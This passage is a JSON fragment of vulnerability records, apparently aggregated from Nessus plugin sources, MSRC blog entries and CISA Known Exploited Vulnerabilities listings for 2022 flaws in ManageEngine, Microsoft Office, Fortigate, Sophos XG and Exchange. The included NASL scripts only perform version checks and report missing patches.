"cpe": ["cpe:/a:zohocorp:manageengine_pam360"], "id": "MANAGEENGINE_PAM360_5510.NASL", "href": "https://www.tenable.com/plugins/nessus/166057", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(166057);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/17\");\n\n script_cve_id(\"CVE-2022-35405\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/10/13\");\n\n script_name(english:\"ManageEngine PAM360 < 5.5 Build 5510 RCE\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is running a web application affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of ManageEngine PAM360 prior to 5.5 Build 5510. It is, therefore, \naffected by a remote code execution vulnerability. An unauthenticated, remote attacker can exploit this \nto bypass authentication and execute arbitrary commands on the remote host.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's \nself-reported version number.\");\n # https://www.manageengine.com/products/passwordmanagerpro/advisory/rce.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4907c125\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ManageEngine PAM360 version 5.5 Build 5510 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-35405\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Zoho Password Manager Pro XML-RPC Java Deserialization');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/06/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/10/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:zohocorp:manageengine_pam360\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"manageengine_pam360_detect.nbin\");\n script_require_keys(\"installed_sw/ManageEngine PAM360\");\n script_require_ports(\"Services/www\", 7272);\n\n exit(0);\n}\n\ninclude('vcf_extras_zoho.inc');\ninclude('http.inc');\n\nvar appname = 'ManageEngine PAM360';\nvar port = get_http_port(default:7272, embedded:TRUE);\n\nvar app_info = vcf::zoho::fix_parse::get_app_info(app:appname, port:port);\n\nvar constraints = [\n { 'fixed_version' : '5510', 'fixed_display' : '5.5 Build 5510' }\n];\n\nvcf::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE\n);\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-03-10T17:04:53", "description": "The remote host is running a version of ManageEngine Password Manager Pro prior to 12.1 Build 12101. It is, therefore, affected by a remote code execution vulnerability. An unauthenticated, remote attacker can exploit this to bypass authentication and execute arbitrary commands on the remote host.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-12T00:00:00", "type": "nessus", "title": "ManageEngine Password Manager Pro < 12.1 Build 12101 RCE", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-35405"], "modified": "2023-01-17T00:00:00", "cpe": ["cpe:/a:manageengine:password_manager_pro"], "id": "MANAGEENGINE_PMP_12101.NASL", "href": "https://www.tenable.com/plugins/nessus/166058", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(166058);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/17\");\n\n script_cve_id(\"CVE-2022-35405\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/10/13\");\n\n script_name(english:\"ManageEngine Password Manager Pro < 12.1 Build 12101 RCE\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is running a web application affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of ManageEngine Password Manager Pro prior to 12.1 Build 12101. \nIt is, therefore, affected by a remote code execution vulnerability. An unauthenticated, remote attacker \ncan exploit this to bypass authentication and execute arbitrary commands on the remote host.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://www.manageengine.com/products/passwordmanagerpro/advisory/rce.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4907c125\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ManageEngine Password Manager Pro version 12.1 build 12101 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-35405\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Zoho Password Manager Pro XML-RPC Java Deserialization');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/06/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/10/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:manageengine:password_manager_pro\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"manageengine_pmp_detect.nbin\");\n script_require_keys(\"installed_sw/ManageEngine Password Manager Pro\");\n script_require_ports(\"Services/www\", 7272);\n\n exit(0);\n}\n\ninclude('http_func.inc');\ninclude('vcf_extras_zoho.inc');\ninclude('http.inc');\n\nvar appname = 'ManageEngine Password Manager Pro';\nvar port = get_http_port(default:7272, embedded:TRUE);\n\nvar app_info = vcf::zoho::fix_parse::get_app_info(app:appname, port:port);\n\nvar constraints = [\n {'fixed_version': '12101', 'fixed_display' : '12.1 Build 12101'}\n];\n\nvcf::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE\n);\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-01-10T19:34:06", "description": "The Microsoft Office Products are missing security updates. It is, therefore, affected by a remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-10-11T00:00:00", "type": "nessus", "title": "Security Updates for Microsoft Office Products (October 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-38048"], "modified": "2022-11-29T00:00:00", "cpe": ["cpe:/a:microsoft:office"], "id": "SMB_NT_MS22_OCT_OFFICE.NASL", "href": "https://www.tenable.com/plugins/nessus/166037", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(166037);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/11/29\");\n\n script_cve_id(\"CVE-2022-38048\");\n script_xref(name:\"MSKB\", value:\"5002026\");\n script_xref(name:\"MSKB\", value:\"5002279\");\n script_xref(name:\"MSKB\", value:\"5002288\");\n script_xref(name:\"MSFT\", value:\"MS22-5002026\");\n script_xref(name:\"MSFT\", value:\"MS22-5002279\");\n script_xref(name:\"MSFT\", value:\"MS22-5002288\");\n script_xref(name:\"IAVA\", value:\"2022-A-0412-S\");\n\n script_name(english:\"Security Updates for Microsoft Office Products (October 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Microsoft Office Products are affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Microsoft Office Products are missing security updates. It is, therefore, affected by a remote code execution\nvulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5002026\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5002279\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5002288\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released the following security updates to address this issue: \n -KB5002026\n -KB5002279\n -KB5002288\n\nFor Office 365, Office 2016 C2R, or Office 2019, ensure automatic\nupdates are enabled or open any office app and manually perform an\nupdate.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-38048\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/10/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/10/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/10/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:office\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"office_installed.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('vcf_extras_office.inc');\n\nvar bulletin = 'MS22-10';\nvar kbs = make_list(\n '5002026',\n '5002279',\n '5002288'\n);\nvar severity = SECURITY_HOLE;\n\nvar app_info = vcf::microsoft::office::get_app_info(app:'Microsoft Office', kbs:kbs, bulletin:bulletin, severity:severity);\n\nvar constraints = [\n {'product' : 'Microsoft Office 2013 SP1', 'kb':'5002279', 'file':'mso.dll', 'fixed_version': '15.0.5493.1000'},\n {'product' : 'Microsoft Office 2016', 'kb':'5002288', 'file':'mso.dll', 'fixed_version': '16.0.5365.1000'},\n {'product' : 'Microsoft Office 2016', 'kb':'5002026', 'file':'mso40uiwin32client.dll', 'fixed_version': '16.0.5365.1000'}\n];\n\nvcf::microsoft::office::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:severity,\n bulletin:bulletin,\n subproduct:'Office'\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-02-24T15:16:55", "description": "The version of Fortigate installed on the remote host is 7.0.x prior to 7.0.7 or 7.2.x prior to 7.2.2. It is, therefore, affected by a vulnerability as referenced in the FG-IR-22-377 advisory:\n\n - An authentication bypass using an alternative path or channel in FortiOS and FortiProxy may allow an unauthenticated attacker to perform operations on the administrative interface via specially crafted HTTPS requests.\n (CVE-2022-40684)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-07T00:00:00", "type": "nessus", "title": "Fortinet Fortigate Authentication Bypass (FG-IR-22-377)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-40684"], "modified": "2023-02-24T00:00:00", "cpe": ["cpe:/o:fortinet:fortios"], "id": "FORTIGATE_FG-IR-22-377.NASL", "href": "https://www.tenable.com/plugins/nessus/165763", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(165763);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/24\");\n\n script_cve_id(\"CVE-2022-40684\");\n script_xref(name:\"IAVA\", value:\"2022-A-0401-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/11/01\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0032\");\n\n script_name(english:\"Fortinet Fortigate Authentication Bypass (FG-IR-22-377)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Fortinet Firewall is missing one or more security-related updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Fortigate installed on the remote host is 7.0.x prior to 7.0.7 or 7.2.x prior to 7.2.2. It is,\ntherefore, affected by a vulnerability as referenced in the FG-IR-22-377 advisory:\n\n - An authentication bypass using an alternative path or channel in FortiOS and FortiProxy may allow an unauthenticated\n attacker to perform operations on the administrative interface via specially crafted HTTPS requests.\n (CVE-2022-40684)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://www.tenable.com/blog/cve-2022-40684-critical-authentication-bypass-in-fortios-and-fortiproxy\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f3062e82\");\n # https://www.bleepingcomputer.com/news/security/fortinet-warns-admins-to-patch-critical-auth-bypass-bug-immediately/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8df9e8be\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Fortigate version 7.0.7 / 7.2.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-40684\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Fortinet FortiOS, FortiProxy, and FortiSwitchManager authentication bypass.');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/10/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/10/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/10/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fortinet:fortios\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Firewalls\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"fortinet_version.nbin\");\n script_require_keys(\"Host/Fortigate/version\", \"Host/Fortigate/model\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras_fortios.inc');\n\nvar app_name = 'Fortigate';\nvar app_info = vcf::get_app_info(app:app_name, kb_ver:'Host/Fortigate/version');\n\nvcf::fortios::verify_product_and_model(product_name:app_name);\n\nvar constraints = [\n { 'min_version' : '7.0.0', 'fixed_version' : '7.0.7' },\n { 'min_version' : '7.2.0', 'fixed_version' : '7.2.2' }\n];\n\nvcf::fortios::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-02-26T20:51:31", "description": "A code injection vulnerability in the User Portal and Webadmin allows a remote attacker to execute code in Sophos Firewall version v19.0 MR1 and older.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-11-23T00:00:00", "type": "nessus", "title": "Sophos XG Firewall <= 19.0.1 RCE", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-3236"], "modified": "2022-11-24T00:00:00", "cpe": ["cpe:/o:sophos:xg_firewall_firmware"], "id": "SOPHOS_XG_SOPHOS-SA-20220923-SFOS-RCE.NASL", "href": "https://www.tenable.com/plugins/nessus/168124", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(168124);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/11/24\");\n\n script_cve_id(\"CVE-2022-3236\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/10/14\");\n\n script_name(english:\"Sophos XG Firewall <= 19.0.1 RCE\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Sophos XG Firewall is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"A code injection vulnerability in the User Portal and Webadmin allows a remote attacker to execute code in Sophos \nFirewall version v19.0 MR1 and older.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://www.sophos.com/en-us/security-advisories/sophos-sa-20220923-sfos-rce\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9e5db689\");\n script_set_attribute(attribute:\"solution\", value:\n\"Refer to the vendor advisory\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-3236\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/09/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/09/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/11/23\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sophos:xg_firewall_firmware\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Firewalls\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"sophos_xg_firewall_detect.nbin\");\n script_require_keys(\"installed_sw/Sophos XG Firewall\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('http.inc');\n\nvar app_name = 'Sophos XG Firewall';\nvar port = get_http_port(default:443);\nvar app_info = vcf::get_app_info(app:app_name, port:port, webapp:TRUE);\n\n# Not checking hotfixes\nif (report_paranoia < 2)\n audit(AUDIT_PARANOID);\n\nvar constraints = [\n {'min_version':'0.0', 'max_version':'19.0.1', 'fixed_display':'See vendor advisory'}\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "msrc": [{"lastseen": "2022-11-08T18:46:25", "description": "November 8, 2022 update - Microsoft released security updates for CVE-2022-41040 and CVE-2022-41082. We recommend that customers protect their organizations by applying the updates immediately to affected systems. The options described in the Mitigations section are no longer recommended. For more information, review the Exchange Team blog. Summary On November 8 Microsoft released security updates \u2026\n\n[ Customer Guidance for Reported Zero-day Vulnerabilities in Microsoft Exchange Server Read More \u00bb](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-30T06:55:00", "type": "msrc", "title": "Customer Guidance for Reported Zero-day Vulnerabilities in Microsoft Exchange Server", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-09-30T06:55:00", "id": "MSRC:4F7507AA26F4DEB78152DE764136012C", "href": "https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-03-14T17:06:18", "description": "November 8, 2022 update - Microsoft released security updates for CVE-2022-41040 and CVE-2022-41082. We recommend that customers protect their organizations by applying the updates immediately to affected systems. The options described in the Mitigations section are no longer recommended. For more information, review the Exchange Team blog. Summary Summary On November 8 Microsoft released security updates for two zero-day vulnerabilities affecting Microsoft Exchange Server 2013, Exchange Server 2016, and Exchange Server 2019.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-30T07:00:00", "type": "msrc", "title": "Customer Guidance for Reported Zero-day Vulnerabilities in Microsoft Exchange Server", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-09-30T07:00:00", "id": "MSRC:644966B4D83B650C284EC9D93664582D", "href": "/blog/2022/09/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/", "cvss": {"score": 0.0, "vector": "NONE"}}], "cisa_kev": [{"lastseen": "2022-10-03T06:50:27", "description": "Microsoft Exchange Server contains an unspecified vulnerability which allows for authenticated remote code execution. Dubbed \"ProxyNotShell,\" this vulnerability is chainable with CVE-2022-41040 which allows for the remote code execution.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-30T00:00:00", "type": "cisa_kev", "title": "Microsoft Exchange Server Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-09-30T00:00:00", "id": "CISA-KEV-CVE-2022-41082", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-03T06:50:27", "description": "Microsoft Exchange Server allows for server-side request forgery. Dubbed \"ProxyNotShell,\" this vulnerability is chainable with CVE-2022-41082 which allows for remote code execution.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-30T00:00:00", "type": "cisa_kev", "title": "Microsoft Exchange Server Server-Side Request Forgery Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-09-30T00:00:00", "id": "CISA-KEV-CVE-2022-41040", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-09-21T22:49:49", "description": "Trend Micro Apex One and Apex One as a Service contain an improper validation of rollback mechanism components that could lead to remote code execution.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-15T00:00:00", "type": "cisa_kev", "title": "Trend Micro Apex One and Apex One as a Service Improper Validation Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-40139"], "modified": "2022-09-15T00:00:00", "id": "CISA-KEV-CVE-2022-40139", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-09-22T20:02:27", "description": "Zoho ManageEngine PAM360, Password Manager Pro, and Access Manager Plus contain an unspecified vulnerability which allows for remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-22T00:00:00", "type": "cisa_kev", "title": "Zoho ManageEngine Multiple Products Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-35405"], "modified": "2022-09-22T00:00:00", "id": "CISA-KEV-CVE-2022-35405", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-20T18:52:08", "description": "Zimbra Collaboration (ZCS) allows an attacker to upload arbitrary files using cpio package to gain incorrect access to any other user accounts.", "cvss3": {"exploitabilityScore": 3.9, 